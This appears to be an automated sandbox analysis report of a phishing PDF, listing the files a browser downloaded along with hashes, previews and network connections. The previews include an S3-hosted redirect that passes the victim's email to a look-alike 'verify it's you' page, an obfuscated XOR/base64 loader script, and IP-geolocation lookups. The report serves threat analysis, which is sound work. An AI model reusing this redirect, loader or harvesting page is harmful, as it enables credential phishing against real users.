                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                          Category:dropped
                                                          Size (bytes):1407294
                                                          Entropy (8bit):7.97605879016224
                                                          Encrypted:false
                                                          SSDEEP:24576:6Fdpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WL07oXGZIZwYIGNPJF:C3mlind9i4ufFXpAXkrfUs03WLxXGZIF
                                                          MD5:DE3EB0CF81E91B312CDC6D26BF58DEC7
                                                          SHA1:016BB9C5ECAF81AC72A159D83190B90CAFF34F61
                                                          SHA-256:8ECB7BD5B7CC0899F818C63A047F611B719AB4A4E3092458A41949D52F5AF848
                                                          SHA-512:966E6BC34DE913C142E5A8E4B8AB5527C27742A055E1B3E4E8E782DC53160340990788EC8CB86FF7943D70D406F002EFEE2943C64AC6F22A5647302732C701F3
                                                          Malicious:false
                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):16
                                                          Entropy (8bit):3.75
                                                          Encrypted:false
                                                          SSDEEP:3:HxMCR:iY
                                                          MD5:33EF2868BE6AA314700E14BD49C768F7
                                                          SHA1:31F61F2918D49D189AD92FB84D8C82B96C075FBE
                                                          SHA-256:A06CB250708EDB37CB17B7ED1019F55808FE237E5B1700722EDF0F451B9ABF92
                                                          SHA-512:1EB3341CE08D51A32F86C61709C6BCFA847761603E5F90584171A29CEDBC78308B9CDCEA9F636107749E76192E5208F17E36A6B59AC6EE0551535A9E8E57959A
                                                          Malicious:false
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnNhspww4z4xBIFDUMF7i4=?alt=proto
                                                          Preview:CgkKBw1DBe4uGgA=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (8794)
                                                          Category:downloaded
                                                          Size (bytes):8831
                                                          Entropy (8bit):5.2261593995743105
                                                          Encrypted:false
                                                          SSDEEP:192:VpqgJqqWFV1NAAacnKflfbMXv7RcJncmoMO8ejok:Vp3JoF+eKpMXdincmovjr
                                                          MD5:4C1820154EC47B89CA1BB86380227ADF
                                                          SHA1:54EDB576DB3B6FBEB0DD9E06876F842B46E3F0D9
                                                          SHA-256:C603134B41351BA0664DF64D8CBC553080C23E608E84DA12F9250EC53E4B8352
                                                          SHA-512:DB5748AC920DA1B0321AC6B3B91549B00C65316EF960678A28FB56CD40E21C8171E49AE8CEA8A490456297169272A697B49C319CF64DE2613CB9AF6910E1DAD2
                                                          Malicious:false
                                                          URL:https://apnasofa.com/episode/script.js
                                                          Preview:var key = "secretkey";.var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US0pWUyIGBkURBgQQH0UFAAoZSzArP0ULExYcYUVZFRANEREdBAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0VZUxhpUkUJYW9ZU0pMUicVGABPR0UGHAYbDwBZFRANEREdBAtzU0UFBwsXHwwWHUUBExYRXVE8HQYMFgBcGBELWkUYeEVUS0VZUxERC0UPYUVZU0VDUkVUS0ULFhEWAAtUCREWEk0QBhddUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZABERSW9US0VZU0UeeEVUFm9zU0VMXUU9BQwNGgQPGx8RSwILEgdDFwgVAglzU0UCBxEbDBcYEQcGFiAZCgwVU1hDFQAALggYGgklAAoZPjc1W0xYeEVUYUVZXEpDPgoXChEQHAtDNgAADgYNGgoNeEVUChYAHQZDFBAaCBEQHAtDFQAAJwoaEhEKHQs9BQMWW0xDCW9US0VZU0UXABxUEG9ZU0VDUkVUS0VZXEpDIhcdBgQLCkUPHQYVHw
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 1871 x 308, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):21327
                                                          Entropy (8bit):7.8373557915707295
                                                          Encrypted:false
                                                          SSDEEP:384:dOKtgdrfxBB7uIPC/gwqaN+v8K6YgEdjyXiIEbXZwkNYhJP8OgL:AK8jxbuT//NNU4X7EbXBNU8OgL
                                                          MD5:AC837B485BC1972521C7D36AE2F98F4C
                                                          SHA1:7901F7AA68B555EFBAA1AD95C9AF1DA21AFD72E0
                                                          SHA-256:25BB457F05BE6DE51815D6619758F22BD413A5DDE4BFFAEDB075DB06D7B9B8F2
                                                          SHA-512:0982C31327AEBCD107E382F317715FCF774CD14DAA3235592ED79930B2BD10F331DBB75565558F50C85AB16A75923DBBB4C0971AA5676A517EFADEDB2E0B5B48
                                                          Malicious:false
                                                          URL:https://apnasofa.com/episode/image/logo.png
                                                          Preview:.PNG........IHDR...O...4.....D.{.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..R.IDATx...Kr.I. Z...7.+ .n....9...5o3"W .q...@K...2.yQ...WP......x7..p..(>@..w.8.,.YY)!...w.................................7.y.........c_2.R....._..>..a.~L. ..|...........k.............9^i&..........$........<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........I.......tzz:n?F..o.w.w_.W]..y.......T..6A...........c........>..w......5.L..^K......x......(]..na'..T...|<;;......O.....W9==.[.......j'x......H:.t..m...P;.S....`-...@........O:==....!.y......$......szz..4.......Xy..........].q.l......).@................n
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):21
                                                          Entropy (8bit):3.463280517810811
                                                          Encrypted:false
                                                          SSDEEP:3:YMb1gXMlY:YMeX6Y
                                                          MD5:188A7DDAF69C860BAF90460AD507337F
                                                          SHA1:530621CCC828AAB3930603814EF80EF1A79103AC
                                                          SHA-256:FE0DA54F56BE632726C7892705F471CC075255DA9D2CEA63AF62699C05FB0A29
                                                          SHA-512:C35AA31D95F3CBA835760FF8434D3B44E4607A43B068480FC9F6599BDADA6B53B362923820ADF073C898D8DDE9515F726F2B7C65662428A5D845116C87D5DC07
                                                          Malicious:false
                                                          URL:https://api.ipify.org/?format=json
                                                          Preview:{"ip":"8.46.123.228"}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (8794)
                                                          Category:dropped
                                                          Size (bytes):8831
                                                          Entropy (8bit):5.2261593995743105
                                                          Encrypted:false
                                                          SSDEEP:192:VpqgJqqWFV1NAAacnKflfbMXv7RcJncmoMO8ejok:Vp3JoF+eKpMXdincmovjr
                                                          MD5:4C1820154EC47B89CA1BB86380227ADF
                                                          SHA1:54EDB576DB3B6FBEB0DD9E06876F842B46E3F0D9
                                                          SHA-256:C603134B41351BA0664DF64D8CBC553080C23E608E84DA12F9250EC53E4B8352
                                                          SHA-512:DB5748AC920DA1B0321AC6B3B91549B00C65316EF960678A28FB56CD40E21C8171E49AE8CEA8A490456297169272A697B49C319CF64DE2613CB9AF6910E1DAD2
                                                          Malicious:false
                                                          Preview:var key = "secretkey";.var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US0pWUyIGBkURBgQQH0UFAAoZSzArP0ULExYcYUVZFRANEREdBAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0VZUxhpUkUJYW9ZU0pMUicVGABPR0UGHAYbDwBZFRANEREdBAtzU0UFBwsXHwwWHUUBExYRXVE8HQYMFgBcGBELWkUYeEVUS0VZUxERC0UPYUVZU0VDUkVUS0ULFhEWAAtUCREWEk0QBhddUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZABERSW9US0VZU0UeeEVUFm9zU0VMXUU9BQwNGgQPGx8RSwILEgdDFwgVAglzU0UCBxEbDBcYEQcGFiAZCgwVU1hDFQAALggYGgklAAoZPjc1W0xYeEVUYUVZXEpDPgoXChEQHAtDNgAADgYNGgoNeEVUChYAHQZDFBAaCBEQHAtDFQAAJwoaEhEKHQs9BQMWW0xDCW9US0VZU0UXABxUEG9ZU0VDUkVUS0VZXEpDIhcdBgQLCkUPHQYVHw
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):58
                                                          Entropy (8bit):4.245069356823525
                                                          Encrypted:false
                                                          SSDEEP:3:YWQRAW6k3RA8LQX+yKLrSNMR4:YWQmyRKjKLrVO
                                                          MD5:96CB1B42BD2A4803FCD22A65EA5DFC98
                                                          SHA1:CA4550A99C8B52EDDDCF7D9BFDFEEF85CD78D885
                                                          SHA-256:41C6BA69A3B925B7C2BCFB14F605DD01582E3AC3589D0247A70A0E7F24338904
                                                          SHA-512:DFFB9D78E91D994A6D4554EC08C3C15D1E63E68A97525B930EB109CA9A3CC52D8C9CA3B2BC5A65A645E35DA1AADDB568A8687DCA677B1460539F65CA2D35EF99
                                                          Malicious:false
                                                          URL:https://ipwhois.app/json/8.46.123.228
                                                          Preview:{"success":false,"message":"you've hit the monthly limit"}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):442
                                                          Entropy (8bit):4.721509219116008
                                                          Encrypted:false
                                                          SSDEEP:6:hxuJzhqIziYcgAjMkBHFiodLcQSpvD9ocMYoQXrA6jMjmmHJ141NLcs4Nhdx434A:hYYxy4LKpvV+6ExHJabLZ4Nbx4IQL
                                                          MD5:495735A2F76DABA1413C4E6E2F30911B
                                                          SHA1:55A577F9EBC9CF60E5931A180CA2C4FF0F896444
                                                          SHA-256:199BD1DDBB59029F61EF8401DA07073AD36DD60EA32B3B2AFDE264DAE949AA58
                                                          SHA-512:413F3E6F0B8543D9826D638B4686443425EC4B6E5FF3602C9AD0A51472D660BF3935B17A0468DB3F8AAC6B3956B3FEF522E8801C8C4F3051E952A0F742BDEB23
                                                          Malicious:false
                                                          URL:https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <script>. // Get the encoded email parameter from the URL hash. var emailEncoded = window.location.hash.substring(1); // Remove the first character '#'.. // Redirect to the specified URL with the encoded email parameter. window.location.href = "https://apnasofa.com/episode/index#" + emailEncoded;. </script>.</head>.<body>.</body>.</html>.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):3703
                                                          Entropy (8bit):4.810174175624268
                                                          Encrypted:false
                                                          SSDEEP:48:czi9BzckSVg7FO9Ets2ve3N8h0BPKqh3GfXsZCSx53ZXHknhi:ukzczuM91IPhEL6sUSx53Z3qc
                                                          MD5:9A15E091F6B3FBF999B00CBD9E6FC5FC
                                                          SHA1:5F6E11417BEA2607EE9C34321C0180C981252767
                                                          SHA-256:70722747860D26455DCD955B57AE5FD9BF15B5A3D6D5CF0D83D413522DB4D11D
                                                          SHA-512:39B802D8F6A003C6BC7CE87D041664A67D1FA67D83C98B8515C93A51B22E71A16B3278253D7DE2A743BFA51DFF321BFB5B4C6B89A709C78AEF0AA8D0BB5D3D47
                                                          Malicious:false
                                                          URL:https://apnasofa.com/episode/style.css
                                                          Preview:* {. margin: 0;. padding: 0;. box-sizing: border-box;.}..body {. background-color: #FFFAFA;. font-family: 'Segoe UI', Arial, sans-serif;. line-height: 1.6;. color: #333;.}...container {. max-width: 800px;. margin: 40px auto;. padding: 20px;. background: #fff;. border-radius: 8px;. box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);.}../* Logo Styles */..logo-container {. text-align: center;. margin-bottom: 20px;. padding: 10px;.}...logo {. max-width: 160px;. height: auto;. margin: 0 auto;.}...verification-section {. text-align: center;. padding: 20px;.}...header {. margin-bottom: 30px;.}...header p {. font-size: 18px;. color: #666;.}../* Email Container Styles */..email-container {. margin: 30px auto;. max-width: 320px;. background: #f8f9fa;. padding: 20px;. border-radius: 6px;. border: 1px solid #e1e1e1;.}...email-box {. display: flex;. align-items: center;. justify-content: center;. gap: 10px
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):687
                                                          Entropy (8bit):5.036546324245533
                                                          Encrypted:false
                                                          SSDEEP:12:YdjYhZImV+xaNmd6wpHKVDosK9Ogi+Bumjc2sVYheq+5OFAtrHJKWeruN7wvX4uZ:Ydj0RNMhH79qmjc20QmJKpyNSX4i
                                                          MD5:A315E2D799EC6E5B18A86AB64FF7D179
                                                          SHA1:79626DC251FBA9CBA353C089011F038843C502BE
                                                          SHA-256:E9451E48696A0ECE088DEF6AB66EE2BE8BB46F3BC4C07448C77999882626AA93
                                                          SHA-512:75072715C413DE825F8F01DEB8E5490863B7CD1A612B240BAE36CF8E3DD75888ABE99678F4E022BBAD0E6E6554C09AC2A31BF11F6805BBEC5CF687C7F11AFA7D
                                                          Malicious:false
                                                          Preview:{"ip":"8.46.123.228","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","country_flag":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","country_capital":"Washington D.C.","country_phone":"+1","country_neighbours":"CA,MX","region":"New York","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"asn":"AS3356","org":"CenturyLink Communications, LLC","isp":"Level","timezone":"America\/New_York","timezone_name":"EST","timezone_dstOffset":0,"timezone_gmtOffset":-18000,"timezone_gmt":"-05:00","currency":"US Dollar","currency_code":"USD","currency_symbol":"$","currency_rates":1,"currency_plural":"US dollars"}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 1871 x 308, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):21327
                                                          Entropy (8bit):7.8373557915707295
                                                          Encrypted:false
                                                          SSDEEP:384:dOKtgdrfxBB7uIPC/gwqaN+v8K6YgEdjyXiIEbXZwkNYhJP8OgL:AK8jxbuT//NNU4X7EbXBNU8OgL
                                                          MD5:AC837B485BC1972521C7D36AE2F98F4C
                                                          SHA1:7901F7AA68B555EFBAA1AD95C9AF1DA21AFD72E0
                                                          SHA-256:25BB457F05BE6DE51815D6619758F22BD413A5DDE4BFFAEDB075DB06D7B9B8F2
                                                          SHA-512:0982C31327AEBCD107E382F317715FCF774CD14DAA3235592ED79930B2BD10F331DBB75565558F50C85AB16A75923DBBB4C0971AA5676A517EFADEDB2E0B5B48
                                                          Malicious:false
                                                          Preview:.PNG........IHDR...O...4.....D.{.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..R.IDATx...Kr.I. Z...7.+ .n....9...5o3"W .q...@K...2.yQ...WP......x7..p..(>@..w.8.,.YY)!...w.................................7.y.........c_2.R....._..>..a.~L. ..|...........k.............9^i&..........$........<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........I.......tzz:n?F..o.w.w_.W]..y.......T..6A...........c........>..w......5.L..^K......x......(]..na'..T...|<;;......O.....W9==.[.......j'x......H:.t..m...P;.S....`-...@........O:==....!.y......$......szz..4.......Xy..........].q.l......).@................n
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):21
                                                          Entropy (8bit):3.463280517810811
                                                          Encrypted:false
                                                          SSDEEP:3:YMb1gXMlY:YMeX6Y
                                                          MD5:188A7DDAF69C860BAF90460AD507337F
                                                          SHA1:530621CCC828AAB3930603814EF80EF1A79103AC
                                                          SHA-256:FE0DA54F56BE632726C7892705F471CC075255DA9D2CEA63AF62699C05FB0A29
                                                          SHA-512:C35AA31D95F3CBA835760FF8434D3B44E4607A43B068480FC9F6599BDADA6B53B362923820ADF073C898D8DDE9515F726F2B7C65662428A5D845116C87D5DC07
                                                          Malicious:false
                                                          Preview:{"ip":"8.46.123.228"}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):1471
                                                          Entropy (8bit):4.503003910018644
                                                          Encrypted:false
                                                          SSDEEP:24:hYkCnJyyX5OQm06DRiaRvusNNoZPddWBHZ4T:GlURiYhodWBHGT
                                                          MD5:81D8BB621BA6DDE48C3AF9A15405F15C
                                                          SHA1:AC555BEC026EB9BF2E8DB8872F84F918CE8EEDDF
                                                          SHA-256:C3F0AC0A08C17363CF98B835232E5FC783425538895E2ED0C6FDF686BC627BD1
                                                          SHA-512:E6E59B1994A1713A4915B9293FAE487CDFD5081E02A02FAAFC0580AD34AEBA1816011CB91968CDE2CA400175C8BFF0169B9854CF138B8450DB39A37B587D8968
                                                          Malicious:false
                                                          URL:https://apnasofa.com/episode/index
                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>pleased</title>. <link rel="stylesheet" href="style.css">.</head>.<body>. <div class="container">. <div class="section verification-section">. <div class="logo-container">. <img src="image/logo.png" class="logo" alt="Logo">. </div>.. <div class="header">. We need to verify it's you. </div>.. <div class="email-container">. <div class="email-box">. <input type="email" id="emailInput" name="email_input" placeholder="Enter your email address" required>. </div>.. <div id="emailError" class="email-error"></div>.. <button class="submit-btn">Verify</button>. </div>.. <div id="emailLoader" class="loader" style="display: none;">. <div
                                                          File type:PDF document, version 1.4, 1 pages
                                                          Entropy (8bit):7.825201039794184
                                                          TrID:
                                                          • Adobe Portable Document Format (5005/1) 100.00%
                                                          File name:Employee_Important_Message.pdf
                                                          File size:37'699 bytes
                                                          MD5:40ecbdeb048b52cbfbf201bf4579a6ff
                                                          SHA1:33757b1ada30b85277e883b13bcd885adcd101a4
                                                          SHA256:2fbc05e0ef487d6b78891eb850078ecc3f73688538bced4a464d1473fa719ca4
                                                          SHA512:f55dfe708180bd6ed9d26d4b65e4239fb83040c85c7b654e61122ea8b176b5f5bb90991fd3abda72ae11c80e1c611c7bbdfeb9c0303f2c8e85011150f9ff1dc3
                                                          SSDEEP:768:IEG6bXHgduJj1ZZLM444444444u8dog9Y68a8PSOOo6lOia:Id6b55ZZw444444444Tx9ROOVlTa
                                                          TLSH:FD03C0F5A4A92DCCFDE3831B7142A2894A6DFE2782CA15C17477CCB6BC308D533651A9
                                                          File Content Preview:%PDF-1.4.1 0 obj.<<./Title (...H.a.p.p.y. .B.i.r.t.h.d.a.y)./Creator (...w.k.h.t.m.l.t.o.p.d.f. .0...1.2...6)./Producer (...Q.t. .4...8...7)./CreationDate (D:20241129062923-08'00').>>.endobj.3 0 obj.<<./Type /ExtGState./SA true./SM 0.02./ca 1.0./CA 1.0./A
                                                          Icon Hash:62cc8caeb29e8ae0

                                                          General

                                                          Header:%PDF-1.4
                                                          Total Entropy:7.825201
                                                          Total Bytes:37699
                                                          Stream Entropy:7.889578
                                                          Stream Bytes:33945
                                                          Entropy outside Streams:5.161984
                                                          Bytes outside Streams:3754
                                                          Number of EOF found:1
                                                          Bytes after EOF:
                                                          NameCount
                                                          obj26
                                                          endobj26
                                                          stream7
                                                          endstream7
                                                          xref1
                                                          trailer1
                                                          startxref1
                                                          /Page1
                                                          /Encrypt0
                                                          /ObjStm0
                                                          /URI0
                                                          /JS0
                                                          /JavaScript0
                                                          /AA0
                                                          /OpenAction0
                                                          /AcroForm0
                                                          /JBIG2Decode0
                                                          /RichMedia0
                                                          /Launch0
                                                          /EmbeddedFile0

                                                          Image Streams

                                                          IDDHASHMD5Preview
                                                          60000474f2b4500008977c0a724c052dc32c540be6d29a792
                                                          104d4d35554b4b47633ffb446b8b6ecd6cb7ba61fae37fdba2
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 2, 2024 17:55:06.845171928 CET49675443192.168.2.4173.222.162.32
                                                          Dec 2, 2024 17:55:09.780680895 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:09.780719042 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:09.780812025 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:09.782526016 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:09.782541037 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:11.680047989 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:11.681237936 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:11.681260109 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:11.682293892 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:11.682370901 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:11.683495045 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:11.683562040 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:11.684362888 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:11.731338978 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:11.772296906 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:11.772310019 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:11.872566938 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:12.513247967 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:12.519740105 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:12.519800901 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:12.526137114 CET49736443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:12.526159048 CET44349736172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:12.529407024 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:12.529434919 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:12.529495955 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:12.529750109 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:12.529766083 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:12.895148993 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:12.895196915 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:12.895272017 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:12.896858931 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:12.896874905 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:13.605416059 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:13.605449915 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:13.607212067 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:13.607212067 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:13.607245922 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:14.237777948 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:14.268671036 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:14.268690109 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:14.269103050 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:14.303867102 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:14.303963900 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:14.304054022 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:14.351330996 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:14.448486090 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:14.448556900 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:14.450989962 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:14.451001883 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:14.451234102 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:14.488081932 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:14.535336018 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:15.013768911 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:15.013847113 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:15.013911963 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:15.013957977 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:15.013979912 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:15.013991117 CET49746443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:15.013998985 CET4434974623.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:15.048826933 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:15.048861980 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:15.048965931 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:15.049340010 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:15.049354076 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:15.260833025 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:15.260914087 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:15.261110067 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:15.261431932 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:15.261454105 CET44349745172.217.19.227192.168.2.4
                                                          Dec 2, 2024 17:55:15.261464119 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:15.261502028 CET49745443192.168.2.4172.217.19.227
                                                          Dec 2, 2024 17:55:15.307661057 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:15.307909012 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:15.307939053 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:15.309029102 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:15.309087038 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:15.313844919 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:15.313913107 CET44349747142.250.181.100192.168.2.4
